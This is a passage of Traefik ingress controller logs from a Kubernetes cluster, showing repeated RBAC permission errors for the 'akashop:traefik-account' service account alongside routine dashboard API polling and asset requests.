scope +E0330 07:26:43.838397 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.1.1 - - [30/Mar/2024:07:26:46 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 274 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:46 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 275 "api@internal" "-" 0ms +W0330 07:26:47.657753 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:26:47.657783 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:26:51 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 276 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:51 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 277 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:26:56 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 278 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:26:56 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 279 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:27:01 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 280 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:01 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 281 "api@internal" "-" 0ms +W0330 07:27:02.142251 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:27:02.142407 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.1.1 - - [30/Mar/2024:07:27:06 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 282 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:27:06 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 283 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:27:11 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 284 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:11 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 285 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:16 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 286 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:27:16 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 287 "api@internal" "-" 0ms +W0330 07:27:17.275415 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:27:17.275443 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:27:21 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 288 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:21 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 289 "api@internal" "-" 0ms +time="2024-03-30T07:27:25Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T07:27:25Z" level=debug msg="http: TLS handshake error from 10.0.0.4:22690: EOF" +10.0.0.4 - - [30/Mar/2024:07:27:26 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 290 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:26 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 291 "api@internal" "-" 0ms +time="2024-03-30T07:27:27Z" level=debug msg="http: TLS handshake error from 10.2.1.1:25907: remote error: tls: unknown certificate" +time="2024-03-30T07:27:27Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +10.2.0.129 - - [30/Mar/2024:07:27:28 +0000] "GET / HTTP/2.0" 404 19 "-" "-" 292 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:31 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 293 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:27:31 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 294 "api@internal" "-" 0ms +W0330 07:27:32.310371 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:27:32.310396 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:27:32.714430 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:27:32.714513 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:27:36 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 295 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:36 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 296 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:41 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 297 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:27:41 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 298 "api@internal" "-" 0ms +W0330 07:27:44.633370 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:27:44.633412 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:27:46 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 299 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:46 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 300 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:51 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 301 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:27:51 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 302 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:27:56 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 303 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:27:56 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 304 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:01 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 305 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:01 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 306 "api@internal" "-" 0ms +W0330 07:28:03.771398 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:28:03.771432 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:28:06 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 307 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:06 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 308 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:11 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 309 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:11 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 310 "api@internal" "-" 0ms +W0330 07:28:12.211798 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:28:12.211925 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:28:16 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 311 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:16 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 312 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:21 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 313 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:21 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 314 "api@internal" "-" 0ms +W0330 07:28:25.491634 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:28:25.491666 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.1.1 - - [30/Mar/2024:07:28:26 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 315 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:26 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 316 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:31 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 317 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:31 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 318 "api@internal" "-" 0ms +W0330 07:28:34.292667 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:28:34.292748 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.1.1 - - [30/Mar/2024:07:28:36 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 319 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:36 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 320 "api@internal" "-" 0ms +W0330 07:28:39.578898 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:28:39.578997 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:28:41 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 321 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:41 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 322 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:46 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 323 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:46 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 324 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:51 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 325 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:51 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 326 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:28:56 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 327 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:28:56 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 328 "api@internal" "-" 0ms +W0330 07:29:00.636146 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:29:00.636184 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:29:01 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 329 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:01 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 330 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:06 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 331 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:06 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 332 "api@internal" "-" 0ms +W0330 07:29:06.344222 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:29:06.344251 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.1.1 - - [30/Mar/2024:07:29:11 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 333 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:11 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 334 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:16 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 335 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:16 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 336 "api@internal" "-" 0ms +W0330 07:29:16.634435 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:29:16.634479 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:29:21 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 337 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:21 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 338 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:26 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 339 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:26 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 340 "api@internal" "-" 0ms +W0330 07:29:28.263060 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:29:28.263177 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:29:31 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 341 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:31 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 342 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:36 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 343 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:36 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 344 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:41 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 345 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:41 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 346 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:46 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 347 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:46 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 348 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:51 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 349 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:51 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 350 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:29:56 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 351 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:29:56 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 352 "api@internal" "-" 0ms +W0330 07:30:00.273304 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:30:00.273353 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.0.0.4 - - [30/Mar/2024:07:30:00 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 353 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:30:00 +0000] "GET /dashboard/css/vendor.609cd54c.css HTTP/1.1" 200 224744 "-" "-" 354 "dashboard@internal" "-" 1ms +10.2.1.1 - - [30/Mar/2024:07:30:01 +0000] "GET /dashboard/css/app.d96a5235.css HTTP/1.1" 200 4333 "-" "-" 355 "dashboard@internal" "-" 0ms +W0330 07:30:01.093369 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:30:01.093408 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.1.1 - - [30/Mar/2024:07:30:01 +0000] "GET /dashboard/js/app.abf00464.js HTTP/1.1" 200 41280 "-" "-" 357 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:01 +0000] "GET /dashboard/js/vendor.5cc359a9.js HTTP/1.1" 200 1223091 "-" "-" 356 "dashboard@internal" "-" 203ms +10.0.0.4 - - [30/Mar/2024:07:30:02 +0000] "GET /dashboard/js/8.7e674596.js HTTP/1.1" 200 18550 "-" "-" 358 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:30:02 +0000] "GET /dashboard/css/chunk-common.52fcdaa7.css HTTP/1.1" 200 4938 "-" "-" 359 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:02 +0000] "GET /dashboard/css/8.cb89174c.css HTTP/1.1" 200 944 "-" "-" 360 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:30:02 +0000] "GET /dashboard/js/chunk-common.5363bb20.js HTTP/1.1" 200 52039 "-" "-" 361 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/css/2.fea02e71.css HTTP/1.1" 200 662 "-" "-" 362 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/js/11.a675a95e.js HTTP/1.1" 200 1950 "-" "-" 363 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/js/2.f326ab8a.js HTTP/1.1" 200 2645 "-" "-" 364 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:30:03 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 365 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:30:03 +0000] "GET /api/version HTTP/1.1" 200 86 "-" "-" 366 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:03 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 367 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/fonts/Eva-Icons.ac165c67.woff2 HTTP/1.1" 200 25952 "-" "-" 368 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/fonts/nunito-v11-latin-600.5a8861ee.woff2 HTTP/1.1" 200 20084 "-" "-" 369 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/fonts/flUhRq6tzZclQEJ-Vdg-IuiaDsNcIhQ8tQ.c5371cfb.woff2 HTTP/1.1" 200 128616 "-" "-" 370 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/fonts/nunito-v11-latin-700.bf2c237c.woff2 HTTP/1.1" 200 20128 "-" "-" 371 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/fonts/nunito-v11-latin-regular.e1a82f09.woff2 HTTP/1.1" 200 19976 "-" "-" 372 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:30:03 +0000] "GET /dashboard/providers/internal.svg HTTP/1.1" 200 3681 "-" "-" 373 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:03 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=2 HTTP/1.1" 400 53 "-" "-" 374 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:04 +0000] "GET /dashboard/fonts/KFOlCnqEu92Fr1MmYUtfBBc-.f5677eb2.woff HTTP/1.1" 200 20424 "-" "-" 375 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:04 +0000] "GET /dashboard/icons/favicon.ico HTTP/1.1" 200 10134 "-" "-" 376 "dashboard@internal" "-" 0ms +W0330 07:30:06.067657 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:30:06.067741 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:30:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 377 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 378 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:13 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 379 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:13 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 380 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:18 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 381 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:18 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 382 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:23 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 383 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:23 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 384 "api@internal" "-" 0ms +W0330 07:30:26.059187 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:30:26.059338 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at 